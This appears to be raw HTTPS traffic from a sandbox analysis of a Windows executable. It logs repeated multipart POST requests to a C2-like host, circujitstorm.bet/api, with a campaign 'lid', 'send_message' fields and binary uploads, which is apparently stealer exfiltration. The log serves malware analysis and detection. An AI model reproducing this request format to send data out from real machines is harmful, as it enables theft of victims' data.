2025-03-05 08:12:35 UTC	816	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:12:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oTTxN7Y8EIXtNdSDzOwvzVf3PZ8eVV39WHqGhNkLMLNF7ObSIyp8kjfC0zunJ4beS7GAM6lY5kMP3fs9ryV%2FUNyLeq1jIQTKau4LmGa4cQ4W8Miuifr2w%2BZagSIuR0OA9JXmNw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b826283c4d0f68-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1516&rtt_var=575&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1043&delivery_rate=1926121&cwnd=202&unsent_bytes=0&cid=cf391ab9d1b6987f&ts=1579&x=0"
2025-03-05 08:12:35 UTC	553	IN	Data Raw: 31 36 31 38 0d 0a 77 72 53 39 68 49 49 37 53 45 6c 45 76 2f 2f 56 48 34 54 72 48 6a 30 49 35 64 35 4b 4d 6f 6e 68 34 4f 55 62 6b 58 58 71 36 72 47 35 6c 73 75 6d 75 41 39 6b 61 7a 66 61 33 65 39 72 39 70 35 37 45 53 71 45 75 6d 67 49 37 34 43 4d 6c 6e 36 39 56 35 79 48 6b 2f 6a 53 33 4f 6a 78 58 6d 52 72 49 63 66 64 37 30 54 2f 79 58 74 54 4b 74 2f 38 4c 31 6a 72 67 49 79 48 65 76 6f 61 6d 6f 62 53 71 74 6a 61 37 4f 64 59 4c 43 67 6f 30 70 71 77 65 75 57 42 63 46 52 6c 6a 62 4e 6f 48 71 75 45 6d 73 63 68 73 7a 69 50 6e 74 43 50 31 63 37 76 6f 45 5a 6b 4d 6d 62 61 6b 66 63 6c 70 6f 70 37 58 32 53 44 75 69 46 61 34 59 6d 45 68 6e 2f 37 42 59 4f 4d 32 61 72 57 32 65 33 74 55 54 67 6c 49 74 57 52 74 6e 44 6c 79 54 49 66 62 5a 2f 38 63 42 43 34 73 59 47 57 61 Data Ascii: 1618wrS9hII7SElEv//VH4TrHj0I5d5KMonh4OUbkXXq6rG5lsumuA9kazfa3e9r9p57ESqEumgI74CMln69V5yHk/jS3OjxXmRrIcfd70T/yXtTKt/8L1jrgIyHevoamobSqtja7OdYLCgo0pqweuWBcFRljbNoHquEmschsziPntCP1c7voEZkMmbakfclpop7X2SDuiFa4YmEhn/7BYOM2arW2e3tUTglItWRtnDlyTIfbZ/8cBC4sYGWa
2025-03-05 08:12:35 UTC	1369	IN	Data Raw: 35 71 31 65 6d 6a 39 43 79 6c 4f 72 6c 37 6c 63 74 50 57 62 43 30 36 34 39 34 59 55 38 42 79 71 4a 75 53 64 43 36 70 47 48 69 57 76 2f 45 6f 36 46 30 4b 37 57 32 75 48 74 56 79 77 73 4a 64 57 5a 74 6e 50 71 67 33 39 62 61 63 66 79 61 46 66 7a 77 39 72 48 53 50 41 54 6a 35 72 51 72 70 62 41 71 50 6b 5a 4c 53 64 6d 68 64 32 39 65 2b 75 41 64 31 68 69 69 36 34 6a 58 2b 69 4b 68 59 46 7a 38 42 2b 43 6a 74 32 68 30 64 72 68 38 6c 63 68 4a 69 58 58 6d 2f 63 7a 70 6f 35 6b 48 7a 4c 48 6b 69 74 42 2f 62 47 42 6c 6d 69 7a 43 4d 61 52 6b 36 66 61 6e 37 36 67 55 43 49 6b 4b 39 43 58 75 58 6a 72 67 48 31 65 5a 34 47 33 4b 56 6a 6a 68 34 57 48 66 66 34 59 68 6f 6a 64 71 4e 50 62 37 4f 6b 5a 5a 47 73 68 78 64 33 76 50 64 61 45 63 46 52 6d 78 59 6b 72 58 75 57 45 6c 4d Data Ascii: 5q1emj9CylOrl7lctPWbC06494YU8ByqJuSdC6pGHiWv/Eo6F0K7W2uHtVywsJdWZtnPqg39bacfyaFfzw9rHSPATj5rQrpbAqPkZLSdmhd29e+uAd1hii64jX+iKhYFz8B+Cjt2h0drh8lchJiXXm/czpo5kHzLHkitB/bGBlmizCMaRk6fan76gUCIkK9CXuXjrgH1eZ4G3KVjjh4WHff4YhojdqNPb7OkZZGshxd3vPdaEcFRmxYkrXuWElM
2025-03-05 08:12:35 UTC	1369	IN	Data Raw: 69 59 6a 56 72 4e 62 59 34 66 4a 4c 4c 79 30 30 31 39 33 35 50 65 47 52 50 41 63 71 73 61 77 2f 51 66 33 42 74 34 52 33 2f 52 43 65 79 4d 7a 75 7a 35 2f 68 37 42 6c 79 61 79 33 64 6b 62 42 31 34 49 31 30 55 47 57 4f 72 69 6c 63 35 5a 47 46 68 33 44 39 47 49 53 42 33 71 66 62 31 4f 7a 74 58 53 30 71 5a 70 50 64 73 47 57 6d 30 54 78 70 65 6f 71 77 42 6c 76 6e 69 73 4b 59 4e 2b 70 58 6a 34 53 54 2b 4a 62 62 36 75 68 54 4a 53 49 73 31 35 4b 2b 66 65 36 41 64 56 78 71 69 37 6f 70 58 4f 65 4f 68 34 52 38 2f 68 4b 49 68 4e 53 6e 31 35 2b 6f 6f 46 34 79 61 33 36 64 72 62 70 78 37 59 55 2b 61 6d 6d 4a 73 69 39 47 71 35 7a 4d 6e 6a 6e 30 47 38 6a 51 6b 36 2f 58 30 75 7a 72 56 79 59 71 4a 74 6d 65 76 58 33 70 6a 48 70 58 59 34 65 75 4c 31 2f 71 67 6f 6d 4d 64 50 30 Data Ascii: iYjVrNbY4fJLLy001935PeGRPAcqsaw/Qf3Bt4R3/RCeyMzuz5/h7Blyay3dkbB14I10UGWOrilc5ZGFh3D9GISB3qfb1OztXS0qZpPdsGWm0TxpeoqwBlvnisKYN+pXj4ST+Jbb6uhTJSIs15K+fe6AdVxqi7opXOeOh4R8/hKIhNSn15+ooF4ya36drbpx7YU+ammJsi9Gq5zMnjn0G8jQk6/X0uzrVyYqJtmevX3pjHpXY4euL1/qgomMdP0
2025-03-05 08:12:35 UTC	1369	IN	Data Raw: 71 62 51 32 75 72 68 58 79 49 75 4c 74 6d 63 73 58 76 6c 68 6e 68 61 61 34 69 34 4a 46 37 68 67 6f 4f 4c 63 76 77 63 6a 63 69 64 34 4e 48 48 70 72 67 5a 47 79 67 77 79 6f 32 37 50 66 6e 48 5a 52 39 74 69 2f 78 77 45 4f 71 52 69 49 31 33 39 68 69 4e 69 39 79 6e 32 39 6e 71 36 6c 41 69 4c 53 6e 55 6a 37 52 78 36 49 35 79 55 32 53 4b 74 69 74 64 71 38 33 43 67 47 47 7a 54 38 69 6b 31 4b 33 34 31 4f 72 6e 47 54 56 6c 50 35 32 61 75 7a 32 2b 79 58 42 56 5a 6f 36 38 49 56 58 6a 69 49 75 43 65 50 67 53 69 34 37 65 72 39 2f 4e 37 4f 4e 58 4b 53 63 71 32 35 79 30 62 2b 36 41 50 42 45 71 67 4b 52 6f 43 4b 75 69 6a 49 70 74 39 41 66 49 6c 35 32 35 6c 74 6a 71 6f 41 46 71 4b 43 66 53 6e 72 5a 77 34 49 42 30 58 32 79 43 73 79 56 65 37 49 53 43 69 6e 66 38 45 59 43 46 Data Ascii: qbQ2urhXyIuLtmcsXvlhnhaa4i4JF7hgoOLcvwcjcid4NHHprgZGygwyo27PfnHZR9ti/xwEOqRiI139hiNi9yn29nq6lAiLSnUj7Rx6I5yU2SKtitdq83CgGGzT8ik1K341OrnGTVlP52auz2+yXBVZo68IVXjiIuCePgSi47er9/N7ONXKScq25y0b+6APBEqgKRoCKuijIpt9AfIl525ltjqoAFqKCfSnrZw4IB0X2yCsyVe7ISCinf8EYCF
2025-03-05 08:12:35 UTC	1004	IN	Data Raw: 76 68 37 46 38 76 4c 53 76 63 6b 72 5a 39 36 59 31 33 56 6d 79 47 73 53 31 64 37 35 47 49 6a 48 62 2f 48 6f 53 46 6b 2b 36 57 32 50 36 67 41 57 6f 61 4b 39 4f 54 73 47 75 6d 6c 6a 4a 47 4b 6f 43 77 61 41 69 72 67 6f 36 49 65 76 77 55 69 34 6e 5a 73 73 54 54 37 2b 68 63 4a 69 41 6f 32 34 2b 78 63 75 2b 4b 66 31 5a 74 6a 37 41 69 55 2b 7a 44 7a 4d 64 2b 36 31 66 51 79 50 43 33 78 74 4b 6d 2f 78 63 7a 61 79 48 52 33 65 38 39 37 6f 52 30 56 57 36 41 73 53 39 57 34 70 47 4c 67 6e 66 7a 45 34 4f 48 31 61 54 56 33 2f 54 6d 58 53 49 6f 4b 39 43 54 74 48 6d 6d 78 7a 78 59 63 73 66 6b 61 47 4c 6d 6a 5a 6d 49 66 75 49 64 79 4a 65 64 75 5a 62 59 36 71 41 42 61 69 38 6f 7a 35 61 32 64 75 32 48 65 31 42 76 6a 62 77 6e 56 4f 69 4e 69 59 5a 36 2b 78 71 46 68 74 6d 70 33 Data Ascii: vh7F8vLSvckrZ96Y13VmyGsS1d75GIjHb/HoSFk+6W2P6gAWoaK9OTsGumljJGKoCwaAirgo6IevwUi4nZssTT7+hcJiAo24+xcu+Kf1Ztj7AiU+zDzMd+61fQyPC3xtKm/xczayHR3e897oR0VW6AsS9W4pGLgnfzE4OH1aTV3/TmXSIoK9CTtHmmxzxYcsfkaGLmjZmIfuIdyJeduZbY6qABai8oz5a2du2He1BvjbwnVOiNiYZ6+xqFhtmp3
2025-03-05 08:12:35 UTC	1369	IN	Data Raw: 33 33 37 63 0d 0a 67 4c 51 67 56 65 75 49 67 6f 68 7a 2f 52 43 61 67 74 2b 71 78 4e 44 6c 37 56 30 6e 49 53 50 55 6a 37 4a 30 34 4d 6b 79 48 32 32 66 2f 48 41 51 30 34 69 4d 74 58 72 6f 56 35 66 47 79 75 44 52 30 36 61 34 47 53 6b 73 4a 64 79 58 76 6e 48 70 6a 6e 68 4e 59 49 43 75 4b 56 48 67 6a 6f 36 48 64 50 34 64 69 59 48 65 72 4e 76 59 34 65 39 63 61 6d 56 6d 32 6f 58 33 4a 61 61 6f 63 56 52 6d 33 4f 5a 6f 54 36 57 61 77 6f 42 31 73 30 2f 49 69 4e 6d 6c 33 4e 4c 6c 37 31 6f 34 4b 69 44 50 6e 62 70 33 39 49 4e 33 57 6d 65 4b 73 53 74 57 37 59 69 4f 6c 58 44 7a 46 49 50 49 6e 65 44 52 78 36 61 34 47 51 6b 38 4d 4e 65 61 75 32 76 74 69 48 39 4a 5a 35 66 38 5a 68 44 36 68 4a 50 48 49 65 55 48 6e 34 2f 4d 37 73 2b 66 34 65 77 5a 63 6d 73 67 31 4a 75 77 65 Data Ascii: 337cgLQgVeuIgohz/RCagt+qxNDl7V0nISPUj7J04MkyH22f/HAQ04iMtXroV5fGyuDR06a4GSksJdyXvnHpjnhNYICuKVHgjo6HdP4diYHerNvY4e9camVm2oX3JaaocVRm3OZoT6WawoB1s0/IiNml3NLl71o4KiDPnbp39IN3WmeKsStW7YiOlXDzFIPIneDRx6a4GQk8MNeau2vtiH9JZ5f8ZhD6hJPHIeUHn4/M7s+f4ewZcmsg1Juwe
2025-03-05 08:12:35 UTC	1369	IN	Data Raw: 66 64 63 6d 6c 61 46 66 6e 77 39 72 48 63 66 67 63 6a 6f 50 51 6f 39 6a 55 37 4f 39 57 49 43 30 67 31 5a 69 33 63 65 61 4d 65 6c 74 75 69 62 73 6d 58 65 71 52 67 59 34 35 76 56 65 50 6b 4a 50 34 6c 76 2f 74 39 6c 77 74 50 57 54 6f 6e 72 6c 7a 34 5a 38 38 51 46 58 4a 2f 43 64 4b 71 39 75 37 6e 6a 6e 30 47 38 6a 51 6b 37 58 52 33 2b 48 36 54 79 30 6e 4e 39 61 51 75 31 2f 70 6a 6d 70 63 5a 59 53 74 49 52 7a 67 6a 73 4c 4a 4f 66 51 50 79 4e 43 54 6a 39 48 4a 35 63 39 61 4f 79 4a 6d 6b 39 32 77 61 36 62 52 50 47 45 71 6c 62 38 34 55 2b 53 53 76 4d 63 68 36 69 6e 49 67 38 57 6e 78 74 7a 77 36 31 51 6d 4f 68 69 64 78 65 4d 76 74 4e 73 75 44 58 58 48 6f 78 63 65 71 34 4c 43 33 30 44 71 56 35 37 49 69 2f 4b 59 6e 2f 53 67 41 57 70 73 4a 63 2b 50 73 58 37 77 69 6a Data Ascii: fdcmlaFfnw9rHcfgcjoPQo9jU7O9WIC0g1Zi3ceaMeltuibsmXeqRgY45vVePkJP4lv/t9lwtPWTonrlz4Z88QFXJ/CdKq9u7njn0G8jQk7XR3+H6Ty0nN9aQu1/pjmpcZYStIRzgjsLJOfQPyNCTj9HJ5c9aOyJmk92wa6bRPGEqlb84U+SSvMch6inIg8Wnxtzw61QmOhidxeMvtNsuDXXHoxceq4LC30DqV57Ii/KYn/SgAWpsJc+PsX7wij
2025-03-05 08:12:35 UTC	1369	IN	Data Raw: 75 32 52 59 2b 6f 36 4f 78 7a 65 7a 57 34 79 44 33 36 58 52 7a 36 6e 79 53 53 45 6e 4d 4a 47 5a 70 54 32 6f 79 57 31 55 5a 5a 57 79 4c 78 2f 36 6c 59 2b 58 65 76 59 51 78 49 44 43 72 64 71 66 71 4b 42 4d 49 53 63 67 30 49 6a 34 62 50 43 4b 61 6c 67 6d 6a 36 30 6c 58 4b 75 38 7a 4d 64 68 73 30 2f 49 76 64 43 75 32 4e 6a 77 38 52 51 4b 49 43 72 65 6b 62 5a 36 70 73 63 38 57 53 72 66 37 32 59 51 37 35 4c 43 33 79 6d 68 54 4e 33 62 68 50 43 45 77 4b 6a 35 47 54 78 72 66 6f 2f 54 39 32 2b 6d 30 54 77 59 61 5a 57 75 4c 6c 50 39 67 4d 57 35 52 2f 49 61 68 38 54 64 71 39 62 59 39 76 5a 43 5a 69 4d 6c 78 34 65 4a 51 38 32 46 65 6c 68 77 67 4c 6f 4f 63 4b 76 4e 77 6f 67 35 71 79 37 49 77 4a 4f 66 6d 4a 2f 2b 6f 41 46 71 48 69 58 54 6b 37 42 72 39 38 52 55 66 46 43 Data Ascii: u2RY+o6OxzezW4yD36XRz6nySSEnMJGZpT2oyW1UZZWyLx/6lY+XevYQxIDCrdqfqKBMIScg0Ij4bPCKalgmj60lXKu8zMdhs0/IvdCu2Njw8RQKICrekbZ6psc8WSrf72YQ75LC3ymhTN3bhPCEwKj5GTxrfo/T92+m0TwYaZWuLlP9gMW5R/Iah8Tdq9bY9vZCZiMlx4eJQ82FelhwgLoOcKvNwog5qy7IwJOfmJ/+oAFqHiXTk7Br98RUfFC
2025-03-05 08:12:35 UTC	1369	IN	Data Raw: 65 47 54 6a 34 68 2b 73 31 6e 49 68 4a 50 34 6c 74 37 73 38 46 51 6c 4c 47 72 61 68 37 41 39 71 4d 6c 79 48 7a 4c 48 76 53 4a 41 35 6f 79 46 79 33 2f 39 47 63 69 58 6e 62 6d 57 79 61 61 34 43 6d 52 72 4e 4a 33 46 39 7a 72 6f 68 48 31 63 5a 49 53 75 4f 6c 62 6f 6c 59 48 41 52 38 30 79 68 59 58 57 72 74 48 68 32 4d 46 54 4f 69 59 70 32 74 2b 58 65 76 43 4b 51 6d 46 64 6c 72 73 34 45 73 32 41 6c 49 51 35 76 56 65 51 79 49 76 67 39 39 58 32 37 56 59 74 61 51 62 61 69 37 51 39 71 4d 6c 34 48 7a 4c 48 6d 53 56 64 37 6f 32 46 78 56 6a 35 42 34 57 48 31 4f 4c 32 32 50 44 6a 47 57 52 72 4b 70 33 46 39 33 7a 73 6d 58 46 51 62 63 75 37 4d 6c 65 72 7a 63 4b 4a 4f 61 74 58 69 59 4c 44 72 64 6e 59 71 75 5a 58 4a 47 73 35 6b 34 54 33 61 36 62 52 4c 78 45 71 6c 66 78 77 Data Ascii: eGTj4h+s1nIhJP4lt7s8FQlLGrah7A9qMlyHzLHvSJA5oyFy3/9GciXnbmWyaa4CmRrNJ3F9zrohH1cZISuOlbolYHAR80yhYXWrtHh2MFTOiYp2t+XevCKQmFdlrs4Es2AlIQ5vVeQyIvg99X27VYtaQbai7Q9qMl4HzLHmSVd7o2FxVj5B4WH1OL22PDjGWRrKp3F93zsmXFQbcu7MlerzcKJOatXiYLDrdnYquZXJGs5k4T3a6bRLxEqlfxw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49709	188.114.97.3	443	7528	C:\Users\user\Desktop\MCxU5Fj.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:12:36 UTC	363	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=UHPVSOVYD Cookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12799 Host: circujitstorm.bet
2025-03-05 08:12:36 UTC	12799	OUT	Data Raw: 2d 2d 55 48 50 56 53 4f 56 59 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 55 48 50 56 53 4f 56 59 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 34 38 31 36 32 36 39 33 38 0d 0a 2d 2d 55 48 50 56 53 4f 56 59 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 48 50 56 53 4f 56 59 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 Data Ascii: --UHPVSOVYDContent-Disposition: form-data; name="act"send_message--UHPVSOVYDContent-Disposition: form-data; name="lid"yau6Na--7481626938--UHPVSOVYDContent-Disposition: form-data; name="pid"2--UHPVSOVYDContent-Disposition: form-da
2025-03-05 08:12:40 UTC	818	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:12:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h5gNXBu%2BGpJ2Ao6WIG3Nc63SdEBXkauMC0kuqvNy3bcXXEmDPLjlgBZQmCysK6jhZE988PX5U5hEt1082Yoc5w668baI8QHvCxOFh1qzaCD8vjxGp2XebIcKntZFHYtpb%2FfAUA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b826358f3a42c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1683&rtt_var=648&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13820&delivery_rate=1665715&cwnd=226&unsent_bytes=0&cid=11e6053eebac404e&ts=4707&x=0"
2025-03-05 08:12:40 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-03-05 08:12:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49713	188.114.97.3	443	7528	C:\Users\user\Desktop\MCxU5Fj.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:12:41 UTC	373	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=169D5VP2O1ZCZFF0O7R Cookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15088 Host: circujitstorm.bet
2025-03-05 08:12:41 UTC	15088	OUT	Data Raw: 2d 2d 31 36 39 44 35 56 50 32 4f 31 5a 43 5a 46 46 30 4f 37 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 31 36 39 44 35 56 50 32 4f 31 5a 43 5a 46 46 30 4f 37 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 34 38 31 36 32 36 39 33 38 0d 0a 2d 2d 31 36 39 44 35 56 50 32 4f 31 5a 43 5a 46 46 30 4f 37 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 36 39 44 35 56 50 32 4f Data Ascii: --169D5VP2O1ZCZFF0O7RContent-Disposition: form-data; name="act"send_message--169D5VP2O1ZCZFF0O7RContent-Disposition: form-data; name="lid"yau6Na--7481626938--169D5VP2O1ZCZFF0O7RContent-Disposition: form-data; name="pid"2--169D5VP2O
2025-03-05 08:12:41 UTC	819	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:12:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ckADbrLeMMUG5Qch9mjPdoUq96SzJ%2Ff84OwWiv3KTS9YBFkgrlZ8%2Fi2HLyTK3tfe2k%2BrDzikyh9B9Au8DNLx9z3kTltI39zgDvrvstsrRsWeOXrM5kql0XRjHed4RDkUqXDYg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b826561cda0fa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1600&rtt_var=610&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16119&delivery_rate=1778319&cwnd=207&unsent_bytes=0&cid=376b3c85a294c1a1&ts=491&x=0"
2025-03-05 08:12:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-03-05 08:12:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49714	188.114.97.3	443	7528	C:\Users\user\Desktop\MCxU5Fj.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:12:42 UTC	370	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=S2X18N1NR38TI21G Cookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20237 Host: circujitstorm.bet
2025-03-05 08:12:42 UTC	15331	OUT	Data Raw: 2d 2d 53 32 58 31 38 4e 31 4e 52 33 38 54 49 32 31 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 65 0d 0a 2d 2d 53 32 58 31 38 4e 31 4e 52 33 38 54 49 32 31 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 34 38 31 36 32 36 39 33 38 0d 0a 2d 2d 53 32 58 31 38 4e 31 4e 52 33 38 54 49 32 31 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 32 58 31 38 4e 31 4e 52 33 38 54 49 32 31 47 0d 0a Data Ascii: --S2X18N1NR38TI21GContent-Disposition: form-data; name="act"send_message--S2X18N1NR38TI21GContent-Disposition: form-data; name="lid"yau6Na--7481626938--S2X18N1NR38TI21GContent-Disposition: form-data; name="pid"3--S2X18N1NR38TI21G
2025-03-05 08:12:42 UTC	4906	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
2025-03-05 08:12:42 UTC	820	IN	HTTP/1.1 200 OK Date: Wed, 05 Mar 2025 08:12:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qMO4QTC5zb0GTyb24mrkG6okU2zqGTWol0Hzo65znLBbZFngF9WK1rXll%2BKvQjD%2BCgI85NdkFFxSbU1Eenn1OPcs5mbKf%2Bgdc3cOtQn04zNTUHLxONbH5aw6bYiuX9dCg5RZEQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91b8265ceb6e5541-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2091&min_rtt=2089&rtt_var=785&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21287&delivery_rate=1397797&cwnd=216&unsent_bytes=0&cid=e7ac8e10297420d2&ts=629&x=0"
2025-03-05 08:12:42 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-03-05 08:12:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49715	188.114.97.3	443	7528	C:\Users\user\Desktop\MCxU5Fj.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-05 08:12:43 UTC	371	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=H2YWGH9EHUL3ZLU1ZW Cookie: __cf_mw_byp=6uS.tfaKQ06xv_k5eXEyZX9Dlcc6cdiaQJaLbJi3.cQ-1741162353-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 2471 Host: circujitstorm.bet
